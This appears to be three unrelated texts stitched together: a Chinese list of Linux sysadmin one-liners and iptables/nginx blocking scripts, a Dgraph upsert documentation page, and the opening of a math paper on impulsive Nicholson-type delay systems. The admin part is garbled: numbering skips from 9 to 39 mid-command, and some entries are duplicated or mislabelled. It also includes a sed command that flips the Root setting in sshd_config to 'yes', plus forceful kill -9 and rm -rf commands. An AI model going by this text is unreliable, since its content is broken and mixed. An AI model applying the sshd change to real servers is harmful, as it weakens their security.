2>&1 & # memory check /usr/bin/vmstat ${DELAY} ${COUNT} > ${DIR}/vmstat_${DAT}.log 2>&1 & # I/O check /usr/bin/iostat ${DELAY} ${COUNT} > ${DIR}/iostat_${DAT}.log 2>&1 & # network check /usr/bin/sar -n DEV ${DELAY} ${COUNT} > ${DIR}/net_${DAT}.log 2>&1 & #/usr/bin/sar -n EDEV ${DELAY} ${COUNT} > ${DIR}/net_edev_${DAT}.log 2>&1 & 放在crontab里每小时自动执行: 0 * * * * /home/check_xu.sh 这样会在/home/oslog/host_yyyymmdd/hh目录下生成各小时cpu、内存、网络,IO的统计数据。 如果某个时间段产生问题了,就可以去看对应的日志信息,看看当时的主机性能如何。 1.删除0字节文件 find -type f -size 0 -exec rm -rf {} ; 2.查看进程 按内存从大到小排列 ps -e -o “%C : %p : %z : %a”|sort -k5 -nr 3.按cpu利用率从大到小排列 ps -e -o “%C : %p : %z : %a”|sort -nr 4.打印说cache里的URL grep -r -a jpg /data/cache/* | strings | grep “http:” | awk -F’http:’ ‘{print “http:”$2;}’ 5.查看http的并发请求数及其TCP连接状态: netstat -n | awk ‘/^tcp/ {++S[$NF]} END {for(a in S) print a, S[a]}’ 6. sed -i ‘/Root/s/no/yes/’ /etc/ssh/sshd_config sed在这个文里Root的一行,匹配Root一行,将no替换成yes. 7.1.如何杀掉mysql进程: ps aux|grep mysql|grep -v grep|awk ‘{print $2}’|xargs kill -9 (从中了解到awk的用途) pgrep mysql |xargs kill -9 killall -TERM mysqld kill -9 `cat /usr/local/apache2/logs/httpd.pid` 试试查杀进程PID 8.显示运行3级别开启的服务: ls /etc/rc3.d/S* |cut -c 15- (从中了解到cut的用途,截取数据) 9.如何在编写SHELL显示多个信息,用EOF cat < /root/pkts 39.然后检查IP的重复数 并从小到大排序 注意 “-t +0″ 中间是两个空格 # less pkts | awk {‘printf $3″n”‘} | cut -d. -f 1-4 | sort | uniq -c | awk {‘printf $1″ “$2″n”‘} | sort -n -t +0 40.查看有多少个活动的php-cgi进程 netstat -anp | grep php-cgi | grep ^tcp | wc -l 41.利用iptables对应简单攻击 netstat -an | grep -v LISTEN | awk ‘{print $5}’ |grep -v 127.0.0.1|grep -v 本机ip|sed “s/::ffff://g”|awk ‘BEGIN { FS=”:” } { Num[$1]++ } END { for(i in Num) if(Num>8) { print i} }’ |grep ‘[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}’| xargs -i[] iptables -I INPUT -s [] -j DROP Num>8部分设定值为阀值,这条句子会自动将netstat -an 中查到的来自同一IP的超过一定量的连接的列入禁止范围。 基中本机ip改成你的服务器的ip地址 42. 怎样知道某个进程在哪个CPU上运行? # ps -eo pid,args,psr 43. 查看硬件制造商 dmidecode -s system-product-name 44.perl如何编译成字节码,这样在处理复杂项目的时候会更快一点? perlcc -B -o webseek webseek.pl 45. 统计var目录下文件以M为大小,以列表形式列出来。 find /var -type f | xargs ls -s | sort -rn | awk ‘{size=$1/1024; printf(“%dMb %sn”, size,$2);}’ | head 查找var目录下文件大于100M的文件,并统计文件的个数 find /var -size +100M -type f | tee file_list | wc -l 46. sed 查找并替换内容 sed -i “s/varnish/LTCache/g” `grep “Via” -rl /usr/local/src/varnish-2.0.4` sed -i “s/X-Varnish/X-LTCache/g” `grep “X-Varnish” -rl /usr/local/src/varnish-2.0.4` 47. 查看服务器制造商 dmidecode -s system-product-name 48. wget 模拟user-agent抓取网页 wget -m -e robots=off -U “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6″ http://www.example.com/ 50. 统计目录下文件的大小(按M打印显示) du $1 –max-depth=1 | sort -n|awk ‘{printf “%7.2fM —-> %sn”,$1/1024,$2}’|sed ’s:/.*/([^/]{1,})$:1:g’ 51.关于CND实施几个相关的统计 统计一个目录中的目录个数 ls -l | awk ‘/^d/’ | wc -l 统计一个目录中的文件个数 ls -l | awk ‘/^-/’ | wc -l 统计一个目录中的全部文件数 find ./ -type f -print | wc -l 统计一个目录中的全部子目录数 find ./ -type d -print | wc -l 统计某类文件的大小: find ./ -name “*.jpg” -exec wc -c {} ;|awk ‘{print $1}’|awk ‘{a+=$1}END{print a}’ 53. 查找占用磁盘IO最多的进程 wget -c http://linux.web.psi.ch/dist/scientific/5/gfa/all/dstat-0.6.7-1.rf.noarch.rpm dstat -M topio -d -M topbio 54. 去掉第一列(如行号代码) awk ‘{for(i=2;i<=NF;i++) if(i!=NF){printf $i” “}else{print $i} }’ list 55.输出256中色彩 for i in {0..255}; do echo -e “e[38;05;${i}m${i}”; done | column -c 80 -s ‘ ‘; echo -e “e[m” 56.查看机器支持内存 机器插内存情况: dmidecode |grep -P “Maximums+Capacity” 机器最大支持内存: dmidecode |grep -P “Maximums+Capacity” 57.查看PHP-CGI占用的内存总数: total=0; for i in `ps -C php-cgi -o rss=`; do total=$(($total+$i)); done; echo “PHP-CGI Memory usage: $total kb” 1.check_user.sh #!/bin/bash echo “You are logged in as `whoami`"; if [ `whoami` != linuxtone ]; then echo “Must be logged on as linuxtone to run this script." exit fi echo “Running script at `date`" 2.do_continue.sh #!/bin/bash doContinue=n echo “Do you really want to continue? (y/n)" read doContinue if [ “$doContinue" != y ]; then echo “Quitting…" exit fi echo “OK… we will continue." 3.hide_input.sh #!/bin/bash stty -echo echo -n “Enter the database system password: " read pw stty echo echo “$pw was entered" 4.is_a_directory.sh #!/bin/bash if [ -z “$1″ ]; then echo “" echo " ERROR : Invalid number of arguments" echo " Usage : $0 " echo “" exit fi if [ -d $1 ]; then echo “$1 is a directory." else echo “$1 is NOT a directory." fi 5.is_readable.sh #!/bin/bash if [ -z “$1″ ]; then echo “" echo " ERROR : Invalid number of arguments" echo " Usage : $0 " echo “" exit fi if [ ! -r $1 ]; then echo “$1 is NOT readable." else echo “$1 is readable." fi 6.print_args.sh #!/bin/bash # # The shift command removes the argument nearest # the command name and replaces it with the next one # while [ $# -ne 0 ] do echo $1 shift done 1. 找出那些被规则禁掉的IP,嗅探器 这段代码会在当前目录下面生成黑名单,根据nginx的access日志,统计被禁掉的403访问,它们不是搜索引擎的爬虫 ,也不是本机地址。 安全提示: 这个脚本对所有IP地址都是全面封杀无误的,所以你自己在使用这个脚本之前,千万要记住,不要为了测试你的规则,而直接用你的电脑,去测试 。因为万一触发了规则,就可能会被下面的脚本所查出来,包含在内。这种状况是可以避免的。 1. 通过openvpn代理上网,如果openvpn和服务器是同一台,那么ip地址就是127.0.0.1,这个IP己经被安全的排除在外了。另外注意,如果你用了chnroute,那么就要看你的VPS是在美国还是在国内,如果在美国,则无需担心,如果在国内,那么chnroute会把路由判断为还是用原来国内的IP,还是会触发规则。建议如果你的VPS在国内,就不要用chnroute。你自己 对网站进行侵入测试,必须挂openvpn来弄。 2. 可以在下面的脚本里面增加一条 grep -v “xx.xx.xx.xx” ,把你的IP排除在外,这个时候就有一点小繁琐,因为如果你跟我一样是用adsl上网,就会需要手动查看自己的IP,每次手动查看IP也挺麻烦的,所以还是建议用第一条方案。 安全脚本文件,用于生成blacklist. 文件名: genblacklist.sh #!/bin/sh cat /var/log/nginx/access_log | grep " 403 " | grep -v google | grep -v sogou | grep -v baidu | grep -v “127.0.0.1″ | grep -v “soso.com" | awk ‘{ print $1 }’ | uniq | awk -F":" ‘{print $4}’ | sort | uniq > blacklist.txt 2. 根据提供的blacklist禁止IP,解禁IP 禁止IP脚本blockip.sh #!/bin/sh echo “Block following ip:" result="" while read LINE do /sbin/iptables -A FORWARD -s $LINE -j DROP if [ $? = “0″ ];then result=$result$LINE"," fi done < /vhosts/blacklist.txt echo $result"Done"; 解禁IP脚本releaseip.sh #!/bin/sh echo "Release following ip:" result="" while read LINE do /sbin/iptables -D FORWARD -s $LINE -j DROP if [ $? = "0" ];then result=$result$LINE"," fi done < /vhosts/blacklist.txt echo $result"Done"; 3. 封杀嗅探器 location ~* .(mdb|asp|rar) { deny all; } if ($http_user_agent ~ ^Mozilla/4.0$ ) { return 403; } 4. 利用Cron自动屏蔽非法IP crontab -e编辑cron任务表。 增加一条*/30 * * * * /vhosts/reblock.sh /vhosts/reblock.sh是自动执行封锁的命令。 #!/bin/sh cd /vhosts /bin/sh /vhosts/releaseip.sh /bin/sh /vhosts/genblacklist.sh /bin/sh /vhosts/blockip.sh echo "total ip in black list:" /bin/cat /vhosts/blacklist.txt | /usr/bin/wc -l 在对某个目录进行压缩的时候,有时候想排除掉某个目录,例如: 如果123目录下有3个子目录,aa、bb、cc。 我现在想只对aa和bb目录打包压缩,命令如下: tar -zcvf 123.tar.gz –exclude=cc 123 (在123目录的外面运行) 使用exclude参数来过滤不需要的目录或文件,排除某个文件的操作和目录一样。 #!/bin/sh # The right of usage, distribution and modification is here by granted by the author. # The author deny any responsibilities and liabilities related to the code. # OK=0 A=`find $1 -print` if expr $3 == 1 >;/dev/null ; then M=Jan ; OK=1 ; fi if expr $3 == 2 >;/dev/null ; then M=Feb ; OK=1 ; fi if expr $3 == 3 >;/dev/null ; then M=Mar ; OK=1 ; fi if expr $3 == 4 >;/dev/null ; then M=Apr ; OK=1 ; fi if expr $3 == 5 >;/dev/null ; then M=May ; OK=1 ; fi if expr $3 == 6 >;/dev/null ; then M=Jun ; OK=1 ; fi if expr $3 == 7 >;/dev/null ; then M=Jul ; OK=1 ; fi if expr $3 == 8 >;/dev/null ; then M=Aug ; OK=1 ; fi if expr $3 == 9 >;/dev/null ; then M=Sep ; OK=1 ; fi if expr $3 == 10 >;/dev/null ; then M=Oct ; OK=1 ; fi if expr $3 == 11 >;/dev/null ; then M=Nov ; OK=1 ; fi if expr $3 == 12 >;/dev/null ; then M=Dec ; OK=1 ; fi if expr $3 == 1 >;/dev/null ; then M=Jan ; OK=1 ; fi if expr $OK == 1 >; /dev/null ; then ls -l –full-time $A 2>;/dev/null | grep “$M $4″ | grep $2 ; else echo Usage: $0 path Year Month Day; echo Example: $0 ~ 1998 6 30; fi 在我们使用CentOS系统的时候,也许时区经常会出现问题,有时候改完之后还是会出错,下面分享一种方法来改变这个状况。 如果没有安装ntp时间同步组件,可以使用命令 yum install ntp 安装 然后:ntpdate us.pool.ntp.org 。 因为CentOS系统是用rhel的源码再编译的,绝大部分是完全一样的。 rhas5的时区是以文件形式存在的,当前的时区文件是在/etc/localtime 那么其他时区的文件存放在哪里呢? 在/usr/share/zoneinfo下 我们用东八区,北京,上海的时间 #cp -f /usr/share/zoneinfo/Asia/Shanghai /etc/localtime #reboot 重启之后,date查看时间、查看当前时区 date -R、查看/修改Linux时区和时间 一、时区 1. 查看当前时区 date -R 2. 修改设置时区 方法(1) tzselect 方法(2) 仅限于RedHat Linux 和 CentOS系统 timeconfig 方法(3) 适用于Debian dpkg-reconfigure tzdata 3. 复制相应的时区文件,替换CentOS系统时区文件;或者创建链接文件 cp /usr/share/zoneinfo/$主时区/$次时区 /etc/localtime 在中国可以使用: cp /usr/share/zoneinfo/Asia/Shanghai /etc/localtime 二、时间 1、查看时间和日期 date 2、设置时间和日期 将CentOS系统日期设定成2011年5月16日的命令 date -s 05/16/11 将CentOS系统时间设定成下午3点33分0秒的命令 date -s 15:33:00 3. 将当前时间和日期写入BIOS,避免重启后失效 hwclock -w 三、定时同步时间 # /usr/sbin/ntpdate 210.72.145.44 > /dev/null 2>&1 这样就完成了关于设置修改CentOS系统时区的问题了。 #!/bin/sh # modprobe ipt_MASQUERADE modprobe ip_conntrack_ftp modprobe ip_nat_ftp iptables -F iptables -t nat -F iptables -X iptables -t nat -X ###########################INPUT键################################### iptables -P INPUT DROP iptables -A INPUT -m state –state ESTABLISHED,RELATED -j ACCEPT iptables -A INPUT -p tcp -m multiport –dports 110,80,25 -j ACCEPT iptables -A INPUT -p tcp -s 192.168.0.0/24 –dport 139 -j ACCEPT #允许内网samba,smtp,pop3,连接 iptables -A INPUT -i eth1 -p udp -m multiport –dports 53 -j ACCEPT #允许dns连接 iptables -A INPUT -p tcp –dport 1723 -j ACCEPT iptables -A INPUT -p gre -j ACCEPT #允许外网vpn连接 iptables -A INPUT -s 192.186.0.0/24 -p tcp -m state –state ESTABLISHED,RELATED -j ACCEPT iptables -A INPUT -i ppp0 -p tcp –syn -m connlimit –connlimit-above 15 -j DROP #为了防止DOS太多连接进来,那么可以允许最多15个初始连接,超过的丢弃 iptables -A INPUT -s 192.186.0.0/24 -p tcp –syn -m connlimit –connlimit-above 15 -j DROP #为了防止DOS太多连接进来,那么可以允许最多15个初始连接,超过的丢弃 iptables -A INPUT -p icmp -m limit –limit 3/s -j LOG –log-level INFO –log-prefix “ICMP packet IN: " iptables -A INPUT -p icmp -j DROP #禁止icmp通信-ping 不通 iptables -t nat -A POSTROUTING -o ppp0 -s 192.168.0.0/24 -j MASQUERADE #内网转发 iptables -N syn-flood iptables -A INPUT -p tcp –syn -j syn-flood iptables -I syn-flood -p tcp -m limit –limit 3/s –limit-burst 6 -j RETURN iptables -A syn-flood -j REJECT #防止SYN攻击 轻量 #######################FORWARD链########################### iptables -P FORWARD DROP iptables -A FORWARD -p tcp -s 192.168.0.0/24 -m multiport –dports 80,110,21,25,1723 -j ACCEPT iptables -A FORWARD -p udp -s 192.168.0.0/24 –dport 53 -j ACCEPT iptables -A FORWARD -p gre -s 192.168.0.0/24 -j ACCEPT iptables -A FORWARD -p icmp -s 192.168.0.0/24 -j ACCEPT #允许 vpn客户走vpn网络连接外网 iptables -A FORWARD -m state –state ESTABLISHED,RELATED -j ACCEPT iptables -I FORWARD -p udp –dport 53 -m string –string “tencent" -m time –timestart 8:15 –timestop 12:30 –days Mon,Tue,Wed,Thu,Fri,Sat -j DROP #星期一到星期六的8:00-12:30禁止qq通信 iptables -I FORWARD -p udp –dport 53 -m string –string “TENCENT" -m time –timestart 8:15 –timestop 12:30 –days Mon,Tue,Wed,Thu,Fri,Sat -j DROP #星期一到星期六的8:00-12:30禁止qq通信 iptables -I FORWARD -p udp –dport 53 -m string –string “tencent" -m time –timestart 13:30 –timestop 20:30 –days Mon,Tue,Wed,Thu,Fri,Sat -j DROP iptables -I FORWARD -p udp –dport 53 -m string –string “TENCENT" -m time –timestart 13:30 –timestop 20:30 –days Mon,Tue,Wed,Thu,Fri,Sat -j DROP #星期一到星期六的13:30-20:30禁止QQ通信 iptables -I FORWARD -s 192.168.0.0/24 -m string –string “qq.com" -m time –timestart 8:15 –timestop 12:30 –days Mon,Tue,Wed,Thu,Fri,Sat -j DROP #星期一到星期六的8:00-12:30禁止qq网页 iptables -I FORWARD -s 192.168.0.0/24 -m string –string “qq.com" -m time –timestart 13:00 –timestop 20:30 –days Mon,Tue,Wed,Thu,Fri,Sat -j DROP #星期一到星期六的13:30-20:30禁止QQ网页 iptables -I FORWARD -s 192.168.0.0/24 -m string –string “ay2000.net" -j DROP iptables -I FORWARD -d 192.168.0.0/24 -m string –string “宽频影院" -j DROP iptables -I FORWARD -s 192.168.0.0/24 -m string –string “色情" -j DROP iptables -I FORWARD -p tcp –sport 80 -m string –string “广告" -j DROP #禁止ay2000.net,宽频影院,色情,广告网页连接 !但中文 不是很理想 iptables -A FORWARD -m ipp2p –edk –kazaa –bit -j DROP iptables -A FORWARD -p tcp -m ipp2p –ares -j DROP iptables -A FORWARD -p udp -m ipp2p –kazaa -j DROP #禁止BT连接 iptables -A FORWARD -p tcp –syn –dport 80 -m connlimit –connlimit-above 15 –connlimit-mask 24 ####################################################################### sysctl -w net.ipv4.ip_forward=1 &>/dev/null #打开转发 ####################################################################### sysctl -w net.ipv4.tcp_syncookies=1 &>/dev/null #打开 syncookie (轻量级预防 DOS 攻击) sysctl -w net.ipv4.netfilter.ip_conntrack_tcp_timeout_established=3800 &>/dev/null #设置默认 TCP 连接痴呆时长为 3800 秒(此选项可以大大降低连接数) sysctl -w net.ipv4.ip_conntrack_max=300000 &>/dev/null #设置支持最大连接树为 30W(这个根据你的内存和 iptables 版本来,每个 connection 需要 300 多个字节) ####################################################################### iptables -I INPUT -s 192.168.0.50 -j ACCEPT iptables -I FORWARD -s 192.168.0.50 -j ACCEPT #192.168.0.50是我的机子,全部放行! ############################完######################################### 1、相关基础知识点 1)redhat的启动方式和执行次序是: 加载内核 执行init程序 /etc/rc.d/rc.sysinit # 由init执行的第一个脚本 /etc/rc.d/rc $RUNLEVEL # $RUNLEVEL为缺省的运行模式 /etc/rc.d/rc.local #相应级别服务启动之后、在执行该文件(其实也可以把需要执行的命令写到该文件中) /sbin/mingetty # 等待用户登录 在Redhat中,/etc/rc.d/rc.sysinit主要做在各个运行模式中相同的初始化工作,包括: 调入keymap以及系统字体 启动swapping 设置主机名 设置NIS域名 检查(fsck)并mount文件系统 打开quota 装载声卡模块 设置系统时钟 等等。 /etc/rc.d/rc则根据其参数指定的运行模式(运行级别,你在inittab文件中可以设置)来执行相应目录下的脚本。凡是以Kxx开头的 ,都以stop为参数来调用;凡是以Sxx开头的,都以start为参数来调用。调用的顺序按xx 从小到大来执行。(其中xx是数字、表示的是启动顺序)例如,假设缺省的运行模式是3,/etc/rc.d/rc就会按上述方式调用 /etc/rc.d/rc3.d/下的脚本。 值得一提的是,Redhat中的运行模式2、3、5都把/etc/rc.d/rc.local做为初始化脚本中 的最后一个,所以用户可以自己在这个文件中添加一些需要在其他初始化工作之后,登录之前执行的命令。 init在等待/etc/rc.d/rc执行完毕之后(因为在/etc/inittab中/etc/rc.d/rc的 action是wait),将在指定的各个虚拟终端上运行/sbin/mingetty,等待用户的登录。 至此,LINUX的启动结束。 2)init运行级别及指令 一、什么是INIT: init是Linux系统操作中不可缺少的程序之一。 所谓的init进程,它是一个由内核启动的用户级进程。 内核自行启动(已经被载入内存,开始运行,并已初始化所有的设备驱动程序和数据结构等)之后,就通过启动一个用户级程序init的方式,完成引导进程。所以,init始终是第一个进程(其进程编号始终为1)。 内核会在过去曾使用过init的几个地方查找它,它的正确位置(对Linux系统来说)是/sbin/init。如果内核找不到init,它就会试着运行/bin/sh,如果运行失败,系统的启动也会失败。 二、运行级别 那么,到底什么是运行级呢? 简单的说,运行级就是操作系统当前正在运行的功能级别。这个级别从1到6 ,具有不同的功能。 不同的运行级定义如下 # 0 – 停机(千万不能把initdefault 设置为0 ) # 1 – 单用户模式 # s init s = init 1 # 2 – 多用户,没有 NFS # 3 – 完全多用户模式(标准的运行级) # 4 – 没有用到 # 5 – X11 多用户图形模式(xwindow) # 6 – 重新启动 (千万不要把initdefault 设置为6 ) 这些级别在/etc/inittab 文件里指定。这个文件是init 程序寻找的主要文件,最先运行的服务是放在/etc/rc.d 目录下的文件。在大多数的Linux 发行版本中,启动脚本都是位于 /etc/rc.d/init.d中的。这些脚本被用ln 命令连接到 /etc/rc.d/rcn.d 目录。(这里的n 就是运行级0-6) 3):chkconfig 命令(redhat 操作系统下) 不像DOS 或者 Windows,Linux 可以有多种运行级。常见的就是多用户的2,3,4,5 ,很多人知道 5 是运行 X-Windows 的级别,而 0 就 是关机了。运行级的改变可以通过 init 命令来切换。例如,假设你要维护系统进入单用户状态,那么,可以使用 init 1 来切换。在 Linux 的运行级的切换过程中,系统会自动寻找对应运行级的目录/etc/rc[0-6].d下的K 和 S 开头的文件,按后面的数字顺序,执行这 些脚本。对这些脚本的维护,是很繁琐的一件事情,Linux 提供了chkconfig 命令用来更新和查询不同运行级上的系统服务。 语法为: chkconfig –list [name] chkconfig –add name chkconfig –del name chkconfig [–level levels] name chkconfig [–level levels] name chkconfig 有五项功能:添加服务,删除服务,列表服务,改变启动信息以及检查特定服务的启动状态。 chkconfig 没有参数运行时,显示用法。如果加上服务名,那么就检查这个服务是否在当前运行级启动。如果是,返回 true,否则返回 false。 –level 选项可以指定要查看的运行级而不一定是当前运行级。 如果在服务名后面指定了on,off 或者 reset,那么 chkconfig 会改变指定服务的启动信息。on 和 off 分别指服务在改变运行级时的 启动和停止。reset 指初始化服务信息,无论有问题的初始化脚本指定了什么。 对于 on 和 off 开关,系统默认只对运行级 3,4, 5有效,但是 reset 可以对所有运行级有效。指定 –level 选项时,可以选择特 定的运行级。 需要说明的是,对于每个运行级,只能有一个启动脚本或者停止脚本。当切换运行级时,init 不会重新启动已经启动的服务,也不会再 次去停止已经停止的服务。 选项介绍: –level levels 指定运行级,由数字 0 到 7 构成的字符串,如: –level 35 表示指定运行级3 和5。 要在运行级别3、4、5中停运 nfs 服务,使用下面的命令:chkconfig –level 345 nfs off –add name 这个选项增加一项新的服务,chkconfig 确保每个运行级有一项 启动(S) 或者 杀死(K) 入口。如有缺少,则会从缺省的init 脚本自动 建立。 –del name 用来删除服务,并把相关符号连接从 /etc/rc[0-6].d 删除。 –list name 列表,如果指定了name 那么只是显示指定的服务名,否则,列出全部服务在不同运行级的状态。 运行级文件 每个被chkconfig 管理的服务需要在对应的init.d 下的脚本加上两行或者更多行的注释。 第一行告诉 chkconfig 缺省启动的运行级以及启动和停止的优先级。如果某服务缺省不在任何运行级启动,那么使用 – 代替运行级。 第二行对服务进行描述,可以用 跨行注释。 例如,random.init 包含三行: # chkconfig: 2345 20 80 # description: Saves and restores system entropy pool for # higher quality random number generation. 表明 random 脚本应该在运行级 2, 3, 4, 5 启动,启动优先权为20,停止优先权为 80。 好了,介绍就到这里了,去看看自己目录下的/etc/rc.d/init.d 下的脚本吧。 设置自启动服务:chkconfig –level 345 nfs on 2. 实例介绍: 1、在linux下安装了apache 服务(通过下载二进制文件经济编译安装、而非rpm包)、apache 服务启动命令: /server/apache/bin/apachectl start 。让apache服务运行在运行级别3下面。 命令如下: 1)touch /etc/rc.d/init.d/apache vi /etc/rc.d/init.d/apache chown -R root /etc/rc.d/init.d/apache chmod 700 /etc/rc.d/init.d/apache ln -s /etc/rc.d/init.d/apache /etc/rc.d/rc3.d/S60apache #S 是start的简写、代表启动、K是kill的简写、代表关闭。60数字 代表启动的顺序。(对于iptv系统而言、许多服务都是建立在数据库启动的前提下才能够正常启动的、可以通过该数字就行调整脚本的 启动顺序)) apache的内容: #!/bin/bash #Start httpd service /server/apache/bin/apachectl start 至此 apache服务就可以在运行级别3下 随机自动启动了。(可以结合chkconfig 对启动服务进行相应的调整)。 由于相关变量定义不同, 所以以下启动顺序仅供参考 3.在Redhat Redflag centos fc linux系统里面脚本的启动 先后: 第一步:通过/boot/vm进行启动 vmlinuz 第二步:init /etc/inittab 第三步:启动相应的脚本,并且打开终端 rc.sysinit rc.d(里面的脚本) rc.local 第四步:启动login登录界面 login 第五步:在用户登录的时候执行sh脚本的顺序:每次登录的时候都会完全执行的 /etc/profile.d/file /etc/profile /etc/bashrc /root/.bashrc /root/.bash_profile 4.在Suse Linux (sles server or Desktop 10) 第一步:通过/boot/vm进行启动 vmlinuz 第二步:init /etc/inittab 第三步:启动相应的脚本,并且打开终端 /etc/init.d/boot 里面包括: . /etc/rc.status ./etc/sysconfig/boot ./etc/init.d/boot.d下面的脚本 ./etc/init.d/boot.local rc X.d(里面的脚本) 第四步:启动login登录界面 login 第五步:在用户登录的时候执行sh脚本的顺序:每次登录的时候都会完全执行的 /etc/profile.d/file /etc/profile /root/.bashrc /root/.profile 先后: 第一步:通过/boot/vm进行启动 vmlinuz 第二步:init /etc/inittab 第三步:启动相应的脚本,并且打开终端 rc.sysinit rc.d(里面的脚本) rc.local 第四步:启动login登录界面 login 第五步:在用户登录的时候执行sh脚本的顺序:每次登录的时候都会完全执行的 /etc/profile.d/file /etc/profile /etc/bashrc /root/.bashrc /root/.bash_profile
__label__pos
0.761117
You are looking at the docs for an older version of Dgraph (v21.03). The latest version is v23.0. Ask a Question External IDs and Upsert Block The upsert block makes managing external IDs easy. Set the schema. xid: string @index(exact) . <http://schema.org/name>: string @index(exact) . <http://schema.org/type>: [uid] @reverse . Set the type first of all. { set { _:blank <xid> "http://schema.org/Person" . _:blank <dgraph.type> "ExternalType" . } } Now you can create a new person and attach its type using the upsert block. upsert { query { var(func: eq(xid, "http://schema.org/Person")) { Type as uid } var(func: eq(<http://schema.org/name>, "Robin Wright")) { Person as uid } } mutation { set { uid(Person) <xid> "https://www.themoviedb.org/person/32-robin-wright" . uid(Person) <http://schema.org/type> uid(Type) . uid(Person) <http://schema.org/name> "Robin Wright" . uid(Person) <dgraph.type> "Person" . } } } You can also delete a person and detach the relation between Type and Person Node. It’s the same as above, but you use the keyword “delete” instead of “set”. “http://schema.org/Person” will remain but “Robin Wright” will be deleted. upsert { query { var(func: eq(xid, "http://schema.org/Person")) { Type as uid } var(func: eq(<http://schema.org/name>, "Robin Wright")) { Person as uid } } mutation { delete { uid(Person) <xid> "https://www.themoviedb.org/person/32-robin-wright" . uid(Person) <http://schema.org/type> uid(Type) . uid(Person) <http://schema.org/name> "Robin Wright" . uid(Person) <dgraph.type> "Person" . } } } Query by user. { q(func: eq(<http://schema.org/name>, "Robin Wright")) { uid xid <http://schema.org/name> <http://schema.org/type> { uid xid } } }
__label__pos
0.530545
Where are my saved Actions? Are saved actions supposed to be added to the dropdown menu of possible actions, or are they stored somewhere else so that they can be applied elsewhere or in the future. Or is it that they are one-offs, and you need to recreate them each time? 2 Likes @Todd_Lichtenwalter This touches slightly on this subject Can We Re-use the same action in an app? 1 Like Same questions for myself!? I was not able to replicate their solution. I tried making an Action. Saved it. Then went to another button, selected Add Action and then typed in the name of the previous action. Nothing happened, it just saved the new action with the startup flowchart elements. 1 Like yeah, as far as I’m aware there is no way (yet) to re-use custom actions elsewhere in your app. I assume it might be a future feature, although I imagine it could get quite tricky as custom actions tend to be very specific to the context in which they are created. 3 Likes You cannot yet reuse actions, but we’re working on some large changes to Glide that will allow this. 9 Likes You know, I was thinking about this today. I was making a concept game with Glide and I needed to rebuidl huge action lists over and over. 1 Like
__label__pos
0.99262
Skip to content Advertisement • Research • Open Access Positive periodic solution for Nicholson-type delay systems with impulsive effects Advances in Difference Equations20152015:371 https://doi.org/10.1186/s13662-015-0705-2 • Received: 4 June 2015 • Accepted: 19 November 2015 • Published: Abstract In this paper, a class of Nicholson-type delay systems with impulsive effects is considered. First, an equivalence relation between the solution (or positive periodic solution) of a Nicholson-type delay system with impulsive effects and that of the corresponding Nicholson-type delay system without impulsive effects is established. Then, by applying the cone fixed point theorem, some criteria are established for the existence and uniqueness of positive periodic solutions of the given systems. Finally, an example and its simulation are provided to illustrate the main results. Our results extend and improve greatly some earlier works reported in the literature. Keywords • Nicholson-type systems • positive periodic solutions • delay • impulsive effect • cone fixed point theorem 1 Introduction To describe the population of the Australian sheep-blowfly and to agree with the experimental data obtained in [1], Gurney et al. [2] proposed the following Nicholson blowflies model: $$ N'(t)=-\delta N(t)+PN(t-\tau)e^{-aN(t-\tau)}, $$ (1.1) where \(N(t)\) is the size of the population at time t, P is the maximum per capita daily egg production, \(\frac{1}{a}\) is the size at which the population reproduces at its maximum rate, δ is the per capita daily adult death rate, and τ is the generation time. Nicholson’s blowflies model and many generalized Nicholson’s blowflies models have attracted more attention because of their extensively realistic significance; see [39]. Recently, in order to describe the models of marine protected areas and B-cell chronic lymphocytic leukemia dynamics, which are examples of Nicholson-type delay differential systems, Berezansky et al. [10], Wang et al. [11], and Liu [12] studied the following Nicholson-type delay systems: $$ \left \{ \textstyle\begin{array}{@{}l} N'_{1}(t) =-\alpha_{1}(t)N_{1}(t)+\beta_{1}(t)N_{2}(t)+\sum_{j=1}^{m} c_{1j}(t)N_{1}(t-\tau_{1j}(t))e^{-\gamma_{1j}(t)N_{1}(t-\tau_{1j}(t))},\\ N'_{2}(t) =-\alpha_{2}(t)N_{2}(t)+\beta_{2}(t)N_{1}(t)+\sum_{j=1}^{m} c_{2j}(t)N_{2}(t-\tau_{2j}(t))e^{-\gamma_{2j}(t)N_{2}(t-\tau_{2j}(t))}, \end{array}\displaystyle \right . $$ (1.2) where \(\alpha_{i}(t), \beta_{i}(t), c_{ij}(t), \gamma_{ij}(t), \tau_{ij}(t)\in C(R, (0,\infty))\), \(i=1,2\), \(j=1,2,\ldots, m\). For constant coefficients and delays, Berezansky et al. [10] presented several results for the permanence and globally asymptotic stability of system (1.2). Supposing that \(\alpha_{i}(t)\), \(\beta_{i}(t)\), \(c_{ij}(t)\), \(\gamma_{ij}(t)\), and \(\tau_{ij}(t)\) are almost periodic functions, Wang et al. [11] obtained some criteria to ensure that the solutions of system (1.2) converge locally exponentially to a positive almost periodic solution. Furthermore, Liu [12] established some criteria for the existence and uniqueness of a positive periodic solution of system (1.2) by applying the method of the Lyapunov function. However, species living in certain medium might undergo abrupt change of state at certain moments, and this occurs due to some seasonal effects such as weather change, food supply, and mating habits. That is to say, besides delays, impulsive effects likewise exist widely in many evolution processes. In the last two decades, the theory of impulsive differential equations has been extensively investigated due to its widespread applications [1316]. Therefore, it is more realistic to investigate Nicholson-type delay systems with impulsive effects. However, to the best of our knowledge, few authors [17] have considered the conditions for existence and uniqueness of positive periodic solution for system (1.2) with impulsive effects. Thus, techniques and methods on the existence and uniqueness of a positive periodic solution for system (1.2) with impulsive effects should be developed and explored. In this paper, we consider the following class of Nicholson-type delay systems with impulsive effects: $$ \left \{ \textstyle\begin{array}{@{}l} y'_{1}(t) =-\alpha_{1}(t)y_{1}(t)+\beta_{1}(t)y_{2}(t)+\sum_{j=1}^{m} c_{1j}(t)y_{1}(t-\tau_{1j}(t))e^{-\gamma_{1j}(t)y_{1}(t-\tau_{1j}(t))},\\ y'_{2}(t) =-\alpha_{2}(t)y_{2}(t)+\beta_{2}(t)y_{1}(t)+\sum_{j=1}^{m} c_{2j}(t)y_{2}(t-\tau_{2j}(t))e^{-\gamma_{2j}(t)y_{2}(t-\tau _{2j}(t))},\\ \quad t\geq t_{0}>0, t\neq t_{k},\\ y_{i}(t^{+}_{k})=(1+b_{k})y_{i}(t_{k}),\quad t\geq t_{0}, t=t_{k} i=1,2, k=1,2,\ldots, \end{array}\displaystyle \right . 